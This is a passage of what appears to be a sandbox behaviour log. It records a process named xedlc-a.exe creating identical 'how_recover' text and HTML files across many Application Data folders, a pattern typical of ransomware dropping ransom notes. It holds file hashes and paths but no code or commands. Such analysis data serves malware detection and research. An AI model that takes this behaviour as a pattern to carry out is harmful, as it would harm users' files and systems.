47916.          sequenceNumber: 828
47917.          value: C:\Documents and Settings\admin\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\brt\how_recover+utm.html
47918.          filesize: 9495
47919.          md5sum: 95f596a25dff51b6af2042b1bbe02985
47920.          sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
47921.          processinfo:
47922.            pid: 1056
47923.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
47924.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
47925.            ads:
47926.          fid (ads:): 281474976778232
47927.          ntstatus: 0x0
47928.          CreateOptions: 0x0
47929.        file:
47930.          timestamp: 69169
47931.          mode: created
47932.          sequenceNumber: 829
47933.          value: C:\Documents and Settings\admin\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\can\how_recover+utm.txt
47934.          processinfo:
47935.            pid: 1056
47936.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
47937.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
47938.            ads:
47939.          fid (ads:): 281474976778233
47940.          ntstatus: 0x0
47941.          CreateOptions: 0x60
47942.        file:
47943.          timestamp: 69189
47944.          mode: close
47945.          sequenceNumber: 830
47946.          value: C:\Documents and Settings\admin\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\can\how_recover+utm.txt
47947.          filesize: 2682
47948.          md5sum: dbb0eda595eb83a05d3bc771ae2561a4
47949.          sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
47950.          processinfo:
47951.            pid: 1056
47952.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
47953.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
47954.            ads:
47955.          fid (ads:): 281474976778233
47956.          ntstatus: 0x0
47957.          CreateOptions: 0x0
47958.        file:
47959.          timestamp: 69198
47960.          mode: created
47961.          sequenceNumber: 831
47962.          value: C:\Documents and Settings\admin\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\can\how_recover+utm.html
47963.          processinfo:
47964.            pid: 1056
47965.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
47966.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
47967.            ads:
47968.          fid (ads:): 281474976778234
47969.          ntstatus: 0x0
47970.          CreateOptions: 0x60
47971.        file:
47972.          timestamp: 69204
47973.          mode: close
47974.          sequenceNumber: 832
47975.          value: C:\Documents and Settings\admin\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\can\how_recover+utm.html
47976.          filesize: 9495
47977.          md5sum: 95f596a25dff51b6af2042b1bbe02985
47978.          sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
47979.          processinfo:
47980.            pid: 1056
47981.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
47982.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
47983.            ads:
47984.          fid (ads:): 281474976778234
47985.          ntstatus: 0x0
47986.          CreateOptions: 0x0
47987.        file:
47988.          timestamp: 69214
47989.          mode: created
47990.          sequenceNumber: 833
47991.          value: C:\Documents and Settings\admin\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\eng\how_recover+utm.txt
47992.          processinfo:
47993.            pid: 1056
47994.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
47995.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
47996.            ads:
47997.          fid (ads:): 281474976778235
47998.          ntstatus: 0x0
47999.          CreateOptions: 0x60
48000.        file:
48001.          timestamp: 69220
48002.          mode: close
48003.          sequenceNumber: 834
48004.          value: C:\Documents and Settings\admin\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\eng\how_recover+utm.txt
48005.          filesize: 2682
48006.          md5sum: dbb0eda595eb83a05d3bc771ae2561a4
48007.          sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
48008.          processinfo:
48009.            pid: 1056
48010.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
48011.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
48012.            ads:
48013.          fid (ads:): 281474976778235
48014.          ntstatus: 0x0
48015.          CreateOptions: 0x0
48016.        file:
48017.          timestamp: 69236
48018.          mode: created
48019.          sequenceNumber: 835
48020.          value: C:\Documents and Settings\admin\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\eng\how_recover+utm.html
48021.          processinfo:
48022.            pid: 1056
48023.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
48024.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
48025.            ads:
48026.          fid (ads:): 281474976778236
48027.          ntstatus: 0x0
48028.          CreateOptions: 0x60
48029.        file:
48030.          timestamp: 69296
48031.          mode: close
48032.          sequenceNumber: 836
48033.          value: C:\Documents and Settings\admin\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\eng\how_recover+utm.html
48034.          filesize: 9495
48035.          md5sum: 95f596a25dff51b6af2042b1bbe02985
48036.          sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
48037.          processinfo:
48038.            pid: 1056
48039.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
48040.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
48041.            ads:
48042.          fid (ads:): 281474976778236
48043.          ntstatus: 0x0
48044.          CreateOptions: 0x0
48045.        file:
48046.          timestamp: 69451
48047.          mode: created
48048.          sequenceNumber: 837
48049.          value: C:\Documents and Settings\admin\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\how_recover+utm.txt
48050.          processinfo:
48051.            pid: 1056
48052.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
48053.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
48054.            ads:
48055.          fid (ads:): 281474976778237
48056.          ntstatus: 0x0
48057.          CreateOptions: 0x60
48058.        file:
48059.          timestamp: 69457
48060.          mode: close
48061.          sequenceNumber: 838
48062.          value: C:\Documents and Settings\admin\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\how_recover+utm.txt
48063.          filesize: 2682
48064.          md5sum: dbb0eda595eb83a05d3bc771ae2561a4
48065.          sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
48066.          processinfo:
48067.            pid: 1056
48068.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
48069.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
48070.            ads:
48071.          fid (ads:): 281474976778237
48072.          ntstatus: 0x0
48073.          CreateOptions: 0x0
48074.        file:
48075.          timestamp: 69464
48076.          mode: created
48077.          sequenceNumber: 839
48078.          value: C:\Documents and Settings\admin\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\how_recover+utm.html
48079.          processinfo:
48080.            pid: 1056
48081.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
48082.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
48083.            ads:
48084.          fid (ads:): 281474976778238
48085.          ntstatus: 0x0
48086.          CreateOptions: 0x60
48087.        file:
48088.          timestamp: 69472
48089.          mode: close
48090.          sequenceNumber: 840
48091.          value: C:\Documents and Settings\admin\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\how_recover+utm.html
48092.          filesize: 9495
48093.          md5sum: 95f596a25dff51b6af2042b1bbe02985
48094.          sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
48095.          processinfo:
48096.            pid: 1056
48097.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
48098.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
48099.            ads:
48100.          fid (ads:): 281474976778238
48101.          ntstatus: 0x0
48102.          CreateOptions: 0x0
48103.        file:
48104.          timestamp: 69628
48105.          mode: created
48106.          sequenceNumber: 841
48107.          value: C:\Documents and Settings\admin\Application Data\Adobe\Linguistics\Dictionaries\how_recover+utm.txt
48108.          processinfo:
48109.            pid: 1056
48110.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
48111.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
48112.            ads:
48113.          fid (ads:): 281474976778239
48114.          ntstatus: 0x0
48115.          CreateOptions: 0x60
48116.        file:
48117.          timestamp: 69634
48118.          mode: close
48119.          sequenceNumber: 842
48120.          value: C:\Documents and Settings\admin\Application Data\Adobe\Linguistics\Dictionaries\how_recover+utm.txt
48121.          filesize: 2682
48122.          md5sum: dbb0eda595eb83a05d3bc771ae2561a4
48123.          sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
48124.          processinfo:
48125.            pid: 1056
48126.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
48127.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
48128.            ads:
48129.          fid (ads:): 281474976778239
48130.          ntstatus: 0x0
48131.          CreateOptions: 0x0
48132.        file:
48133.          timestamp: 69713
48134.          mode: created
48135.          sequenceNumber: 843
48136.          value: C:\Documents and Settings\admin\Application Data\Adobe\Linguistics\Dictionaries\how_recover+utm.html
48137.          processinfo:
48138.            pid: 1056
48139.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
48140.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
48141.            ads:
48142.          fid (ads:): 281474976778240
48143.          ntstatus: 0x0
48144.          CreateOptions: 0x60
48145.        file:
48146.          timestamp: 69724
48147.          mode: close
48148.          sequenceNumber: 844
48149.          value: C:\Documents and Settings\admin\Application Data\Adobe\Linguistics\Dictionaries\how_recover+utm.html
48150.          filesize: 9495
48151.          md5sum: 95f596a25dff51b6af2042b1bbe02985
48152.          sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
48153.          processinfo:
48154.            pid: 1056
48155.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
48156.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
48157.            ads:
48158.          fid (ads:): 281474976778240
48159.          ntstatus: 0x0
48160.          CreateOptions: 0x0
48161.        file:
48162.          timestamp: 69731
48163.          mode: created
48164.          sequenceNumber: 845
48165.          value: C:\Documents and Settings\admin\Application Data\Adobe\Linguistics\how_recover+utm.txt
48166.          processinfo:
48167.            pid: 1056
48168.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
48169.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
48170.            ads:
48171.          fid (ads:): 281474976778241
48172.          ntstatus: 0x0
48173.          CreateOptions: 0x60
48174.        file:
48175.          timestamp: 69742
48176.          mode: close
48177.          sequenceNumber: 846
48178.          value: C:\Documents and Settings\admin\Application Data\Adobe\Linguistics\how_recover+utm.txt
48179.          filesize: 2682
48180.          md5sum: dbb0eda595eb83a05d3bc771ae2561a4
48181.          sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
48182.          processinfo:
48183.            pid: 1056
48184.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
48185.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
48186.            ads:
48187.          fid (ads:): 281474976778241
48188.          ntstatus: 0x0
48189.          CreateOptions: 0x0
48190.        file:
48191.          timestamp: 70066
48192.          mode: created
48193.          sequenceNumber: 847
48194.          value: C:\Documents and Settings\admin\Application Data\Adobe\Linguistics\how_recover+utm.html
48195.          processinfo:
48196.            pid: 1056
48197.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
48198.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
48199.            ads:
48200.          fid (ads:): 281474976778242
48201.          ntstatus: 0x0
48202.          CreateOptions: 0x60
48203.        file:
48204.          timestamp: 70072
48205.          mode: close
48206.          sequenceNumber: 848
48207.          value: C:\Documents and Settings\admin\Application Data\Adobe\Linguistics\how_recover+utm.html
48208.          filesize: 9495
48209.          md5sum: 95f596a25dff51b6af2042b1bbe02985
48210.          sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
48211.          processinfo:
48212.            pid: 1056
48213.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
48214.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
48215.            ads:
48216.          fid (ads:): 281474976778242
48217.          ntstatus: 0x0
48218.          CreateOptions: 0x0
48219.        file:
48220.          timestamp: 70079
48221.          mode: created
48222.          sequenceNumber: 849
48223.          value: C:\Documents and Settings\admin\Application Data\Adobe\how_recover+utm.txt
48224.          processinfo:
48225.            pid: 1056
48226.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
48227.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
48228.            ads:
48229.          fid (ads:): 281474976778243
48230.          ntstatus: 0x0
48231.          CreateOptions: 0x60
48232.        file:
48233.          timestamp: 70100
48234.          mode: close
48235.          sequenceNumber: 850
48236.          value: C:\Documents and Settings\admin\Application Data\Adobe\how_recover+utm.txt
48237.          filesize: 2682
48238.          md5sum: dbb0eda595eb83a05d3bc771ae2561a4
48239.          sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
48240.          processinfo:
48241.            pid: 1056
48242.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
48243.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
48244.            ads:
48245.          fid (ads:): 281474976778243
48246.          ntstatus: 0x0
48247.          CreateOptions: 0x0
48248.        file:
48249.          timestamp: 70283
48250.          mode: created
48251.          sequenceNumber: 851
48252.          value: C:\Documents and Settings\admin\Application Data\Adobe\how_recover+utm.html
48253.          processinfo:
48254.            pid: 1056
48255.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
48256.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
48257.            ads:
48258.          fid (ads:): 281474976778244
48259.          ntstatus: 0x0
48260.          CreateOptions: 0x60
48261.        file:
48262.          timestamp: 70288
48263.          mode: close
48264.          sequenceNumber: 852
48265.          value: C:\Documents and Settings\admin\Application Data\Adobe\how_recover+utm.html
48266.          filesize: 9495
48267.          md5sum: 95f596a25dff51b6af2042b1bbe02985
48268.          sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
48269.          processinfo:
48270.            pid: 1056
48271.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
48272.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
48273.            ads:
48274.          fid (ads:): 281474976778244
48275.          ntstatus: 0x0
48276.          CreateOptions: 0x0
48277.        file:
48278.          timestamp: 70295
48279.          mode: created
48280.          sequenceNumber: 853
48281.          value: C:\Documents and Settings\admin\Application Data\AdobeUM\how_recover+utm.txt
48282.          processinfo:
48283.            pid: 1056
48284.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
48285.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
48286.            ads:
48287.          fid (ads:): 281474976778245
48288.          ntstatus: 0x0
48289.          CreateOptions: 0x60
48290.        apicall:
48291.          timestamp: 70301
48292.          repeat: 60
48293.          sequenceNumber: 854
48294.          processinfo:
48295.            pid: 1056
48296.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
48297.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
48298.          dllname: kernel32.dll
48299.          apiname: Sleep
48300.          address: 0x0041ed5b
48301.        file:
48302.          timestamp: 70306
48303.          mode: close
48304.          sequenceNumber: 855
48305.          value: C:\Documents and Settings\admin\Application Data\AdobeUM\how_recover+utm.txt
48306.          filesize: 2682
48307.          md5sum: dbb0eda595eb83a05d3bc771ae2561a4
48308.          sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
48309.          processinfo:
48310.            pid: 1056
48311.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
48312.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
48313.            ads:
48314.          fid (ads:): 281474976778245
48315.          ntstatus: 0x0
48316.          CreateOptions: 0x0
48317.        file:
48318.          timestamp: 70312
48319.          mode: created
48320.          sequenceNumber: 856
48321.          value: C:\Documents and Settings\admin\Application Data\AdobeUM\how_recover+utm.html
48322.          processinfo:
48323.            pid: 1056
48324.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
48325.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
48326.            ads:
48327.          fid (ads:): 281474976778246
48328.          ntstatus: 0x0
48329.          CreateOptions: 0x60
48330.        file:
48331.          timestamp: 70318
48332.          mode: close
48333.          sequenceNumber: 857
48334.          value: C:\Documents and Settings\admin\Application Data\AdobeUM\how_recover+utm.html
48335.          filesize: 9495
48336.          md5sum: 95f596a25dff51b6af2042b1bbe02985
48337.          sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
48338.          processinfo:
48339.            pid: 1056
48340.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
48341.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
48342.            ads:
48343.          fid (ads:): 281474976778246
48344.          ntstatus: 0x0
48345.          CreateOptions: 0x0
48346.        file:
48347.          timestamp: 70325
48348.          mode: created
48349.          sequenceNumber: 858
48350.          value: C:\Documents and Settings\admin\Application Data\Apple Computer\Quicktime\how_recover+utm.txt
48351.          processinfo:
48352.            pid: 1056
48353.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
48354.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
48355.            ads:
48356.          fid (ads:): 281474976778247
48357.          ntstatus: 0x0
48358.          CreateOptions: 0x60
48359.        file:
48360.          timestamp: 70330
48361.          mode: close
48362.          sequenceNumber: 859
48363.          value: C:\Documents and Settings\admin\Application Data\Apple Computer\Quicktime\how_recover+utm.txt
48364.          filesize: 2682
48365.          md5sum: dbb0eda595eb83a05d3bc771ae2561a4
48366.          sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
48367.          processinfo:
48368.            pid: 1056
48369.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
48370.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
48371.            ads:
48372.          fid (ads:): 281474976778247
48373.          ntstatus: 0x0
48374.          CreateOptions: 0x0
48375.        file:
48376.          timestamp: 70341
48377.          mode: created
48378.          sequenceNumber: 860
48379.          value: C:\Documents and Settings\admin\Application Data\Apple Computer\Quicktime\how_recover+utm.html
48380.          processinfo:
48381.            pid: 1056
48382.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
48383.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
48384.            ads:
48385.          fid (ads:): 281474976778248
48386.          ntstatus: 0x0
48387.          CreateOptions: 0x60
48388.        file:
48389.          timestamp: 70347
48390.          mode: close
48391.          sequenceNumber: 861
48392.          value: C:\Documents and Settings\admin\Application Data\Apple Computer\Quicktime\how_recover+utm.html
48393.          filesize: 9495
48394.          md5sum: 95f596a25dff51b6af2042b1bbe02985
48395.          sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
48396.          processinfo:
48397.            pid: 1056
48398.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
48399.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
48400.            ads:
48401.          fid (ads:): 281474976778248
48402.          ntstatus: 0x0
48403.          CreateOptions: 0x0
48404.        file:
48405.          timestamp: 70353
48406.          mode: created
48407.          sequenceNumber: 862
48408.          value: C:\Documents and Settings\admin\Application Data\Apple Computer\how_recover+utm.txt
48409.          processinfo:
48410.            pid: 1056
48411.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
48412.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
48413.            ads:
48414.          fid (ads:): 281474976778249
48415.          ntstatus: 0x0
48416.          CreateOptions: 0x60
48417.        file:
48418.          timestamp: 70359
48419.          mode: close
48420.          sequenceNumber: 863
48421.          value: C:\Documents and Settings\admin\Application Data\Apple Computer\how_recover+utm.txt
48422.          filesize: 2682
48423.          md5sum: dbb0eda595eb83a05d3bc771ae2561a4
48424.          sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
48425.          processinfo:
48426.            pid: 1056
48427.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
48428.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
48429.            ads:
48430.          fid (ads:): 281474976778249
48431.          ntstatus: 0x0
48432.          CreateOptions: 0x0
48433.        file:
48434.          timestamp: 70387
48435.          mode: created
48436.          sequenceNumber: 864
48437.          value: C:\Documents and Settings\admin\Application Data\Apple Computer\how_recover+utm.html
48438.          processinfo:
48439.            pid: 1056
48440.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
48441.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
48442.            ads:
48443.          fid (ads:): 281474976778250
48444.          ntstatus: 0x0
48445.          CreateOptions: 0x60
48446.        file:
48447.          timestamp: 70392
48448.          mode: close
48449.          sequenceNumber: 865
48450.          value: C:\Documents and Settings\admin\Application Data\Apple Computer\how_recover+utm.html
48451.          filesize: 9495
48452.          md5sum: 95f596a25dff51b6af2042b1bbe02985
48453.          sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
48454.          processinfo:
48455.            pid: 1056
48456.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
48457.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
48458.            ads:
48459.          fid (ads:): 281474976778250
48460.          ntstatus: 0x0
48461.          CreateOptions: 0x0
48462.        file:
48463.          timestamp: 70413
48464.          mode: created
48465.          sequenceNumber: 866
48466.          value: C:\Documents and Settings\admin\Application Data\FileZilla\how_recover+utm.txt
48467.          processinfo:
48468.            pid: 1056
48469.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
48470.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
48471.            ads:
48472.          fid (ads:): 281474976778251
48473.          ntstatus: 0x0
48474.          CreateOptions: 0x60
48475.        file:
48476.          timestamp: 70418
48477.          mode: close
48478.          sequenceNumber: 867
48479.          value: C:\Documents and Settings\admin\Application Data\FileZilla\how_recover+utm.txt
48480.          filesize: 2682
48481.          md5sum: dbb0eda595eb83a05d3bc771ae2561a4
48482.          sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
48483.          processinfo:
48484.            pid: 1056
48485.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
48486.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
48487.            ads:
48488.          fid (ads:): 281474976778251
48489.          ntstatus: 0x0
48490.          CreateOptions: 0x0
48491.        file:
48492.          timestamp: 70426
48493.          mode: created
48494.          sequenceNumber: 868
48495.          value: C:\Documents and Settings\admin\Application Data\FileZilla\how_recover+utm.html
48496.          processinfo:
48497.            pid: 1056
48498.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
48499.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
48500.            ads:
48501.          fid (ads:): 281474976778252
48502.          ntstatus: 0x0
48503.          CreateOptions: 0x60
48504.        file:
48505.          timestamp: 70431
48506.          mode: close
48507.          sequenceNumber: 869
48508.          value: C:\Documents and Settings\admin\Application Data\FileZilla\how_recover+utm.html
48509.          filesize: 9495
48510.          md5sum: 95f596a25dff51b6af2042b1bbe02985
48511.          sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
48512.          processinfo:
48513.            pid: 1056
48514.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
48515.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
48516.            ads:
48517.          fid (ads:): 281474976778252
48518.          ntstatus: 0x0
48519.          CreateOptions: 0x0
48520.        file:
48521.          timestamp: 70439
48522.          mode: created
48523.          sequenceNumber: 870
48524.          value: C:\Documents and Settings\admin\Application Data\Identities\{3D364D28-DDA0-4EA8-B8A3-09FA4E4F1754}\how_recover+utm.txt
48525.          processinfo:
48526.            pid: 1056
48527.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
48528.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
48529.            ads:
48530.          fid (ads:): 281474976778253
48531.          ntstatus: 0x0
48532.          CreateOptions: 0x60
48533.        file:
48534.          timestamp: 70445
48535.          mode: close
48536.          sequenceNumber: 871
48537.          value: C:\Documents and Settings\admin\Application Data\Identities\{3D364D28-DDA0-4EA8-B8A3-09FA4E4F1754}\how_recover+utm.txt
48538.          filesize: 2682
48539.          md5sum: dbb0eda595eb83a05d3bc771ae2561a4
48540.          sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
48541.          processinfo:
48542.            pid: 1056
48543.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
48544.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
48545.            ads:
48546.          fid (ads:): 281474976778253
48547.          ntstatus: 0x0
48548.          CreateOptions: 0x0
48549.        file:
48550.          timestamp: 70452
48551.          mode: created
48552.          sequenceNumber: 872
48553.          value: C:\Documents and Settings\admin\Application Data\Identities\{3D364D28-DDA0-4EA8-B8A3-09FA4E4F1754}\how_recover+utm.html
48554.          processinfo:
48555.            pid: 1056
48556.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
48557.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
48558.            ads:
48559.          fid (ads:): 281474976778254
48560.          ntstatus: 0x0
48561.          CreateOptions: 0x60
48562.        file:
48563.          timestamp: 70458
48564.          mode: close
48565.          sequenceNumber: 873
48566.          value: C:\Documents and Settings\admin\Application Data\Identities\{3D364D28-DDA0-4EA8-B8A3-09FA4E4F1754}\how_recover+utm.html
48567.          filesize: 9495
48568.          md5sum: 95f596a25dff51b6af2042b1bbe02985
48569.          sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
48570.          processinfo:
48571.            pid: 1056
48572.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
48573.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
48574.            ads:
48575.          fid (ads:): 281474976778254
48576.          ntstatus: 0x0
48577.          CreateOptions: 0x0
48578.        file:
48579.          timestamp: 70464
48580.          mode: created
48581.          sequenceNumber: 874
48582.          value: C:\Documents and Settings\admin\Application Data\Identities\how_recover+utm.txt
48583.          processinfo:
48584.            pid: 1056
48585.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
48586.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
48587.            ads:
48588.          fid (ads:): 281474976778255
48589.          ntstatus: 0x0
48590.          CreateOptions: 0x60
48591.        file:
48592.          timestamp: 70470
48593.          mode: close
48594.          sequenceNumber: 875
48595.          value: C:\Documents and Settings\admin\Application Data\Identities\how_recover+utm.txt
48596.          filesize: 2682
48597.          md5sum: dbb0eda595eb83a05d3bc771ae2561a4
48598.          sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
48599.          processinfo:
48600.            pid: 1056
48601.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
48602.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
48603.            ads:
48604.          fid (ads:): 281474976778255
48605.          ntstatus: 0x0
48606.          CreateOptions: 0x0
48607.        file:
48608.          timestamp: 70493
48609.          mode: created
48610.          sequenceNumber: 876
48611.          value: C:\Documents and Settings\admin\Application Data\Identities\how_recover+utm.html
48612.          processinfo:
48613.            pid: 1056
48614.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
48615.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
48616.            ads:
48617.          fid (ads:): 281474976778256
48618.          ntstatus: 0x0
48619.          CreateOptions: 0x60
48620.        file:
48621.          timestamp: 70499
48622.          mode: close
48623.          sequenceNumber: 877
48624.          value: C:\Documents and Settings\admin\Application Data\Identities\how_recover+utm.html
48625.          filesize: 9495
48626.          md5sum: 95f596a25dff51b6af2042b1bbe02985
48627.          sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
48628.          processinfo:
48629.            pid: 1056
48630.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
48631.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
48632.            ads:
48633.          fid (ads:): 281474976778256
48634.          ntstatus: 0x0
48635.          CreateOptions: 0x0
48636.        file:
48637.          timestamp: 70507
48638.          mode: created
48639.          sequenceNumber: 878
48640.          value: C:\Documents and Settings\admin\Application Data\Microsoft\AddIns\how_recover+utm.txt
48641.          processinfo:
48642.            pid: 1056
48643.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
48644.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
48645.            ads:
48646.          fid (ads:): 281474976778257
48647.          ntstatus: 0x0
48648.          CreateOptions: 0x60
48649.        file:
48650.          timestamp: 70512
48651.          mode: close
48652.          sequenceNumber: 879
48653.          value: C:\Documents and Settings\admin\Application Data\Microsoft\AddIns\how_recover+utm.txt
48654.          filesize: 2682
48655.          md5sum: dbb0eda595eb83a05d3bc771ae2561a4
48656.          sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
48657.          processinfo:
48658.            pid: 1056
48659.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
48660.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
48661.            ads:
48662.          fid (ads:): 281474976778257
48663.          ntstatus: 0x0
48664.          CreateOptions: 0x0
48665.        file:
48666.          timestamp: 70519
48667.          mode: created
48668.          sequenceNumber: 880
48669.          value: C:\Documents and Settings\admin\Application Data\Microsoft\AddIns\how_recover+utm.html
48670.          processinfo:
48671.            pid: 1056
